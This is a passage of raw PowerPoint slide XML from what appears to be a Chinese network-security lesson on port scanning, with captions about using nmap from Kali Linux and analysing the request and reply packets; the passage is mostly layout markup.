          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5554345" y="1728788"/>
            <a:ext cx="5276850" cy="3400425"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="103" name="文本框 102"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5554345" y="5129213"/>
            <a:ext cx="5080000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图2-2-36 分析请求数据包</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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组合 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="479781" y="2216574"/>
            <a:ext cx="4062095" cy="638810"/>
            <a:chOff x="6627851" y="3377688"/>
            <a:chExt cx="4062095" cy="639173"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="矩形: 圆角 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="3493208"/>
              <a:ext cx="457200" cy="457200"/>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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形 8" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293331" y="3709982"/>
              <a:ext cx="3396615" cy="306879"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>使用nmap工具进行指定端口扫描并分析</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="文本框 573"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="3377688"/>
              <a:ext cx="868680" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>步骤一</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="文本框 574"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="3537851"/>
              <a:ext cx="450850" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>01</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目实施】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="矩形 1"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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3" name="矩形 2"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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4" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="3431540" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.2.</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> 端口扫描</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="103" name="文本框 102"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5894705" y="1180465"/>
            <a:ext cx="5080000" cy="645160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="304800"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>4.这里是目标主机对Kali Linux回应的一个1025的包，如图2-2-37所示。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5894705" y="1825625"/>
            <a:ext cx="5276850" cy="3543300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="104" name="文本框 103"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5894705" y="5368925"/>
            <a:ext cx="5080000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图2-2-37 分析返回数据包</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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组合 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="479781" y="2216574"/>
            <a:ext cx="4062095" cy="638810"/>
            <a:chOff x="6627851" y="3377688"/>
            <a:chExt cx="4062095" cy="639173"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="矩形: 圆角 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="3493208"/>
              <a:ext cx="457200" cy="457200"/>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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形 8" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293331" y="3709982"/>
              <a:ext cx="3396615" cy="306879"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>使用nmap工具进行指定端口扫描并分析</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="文本框 573"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="3377688"/>
              <a:ext cx="868680" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>步骤一</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="文本框 574"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="3537851"/>
              <a:ext cx="450850" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>01</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目实施】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="矩形 1"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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3" name="矩形 2"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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4" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="3431540" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.2.</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
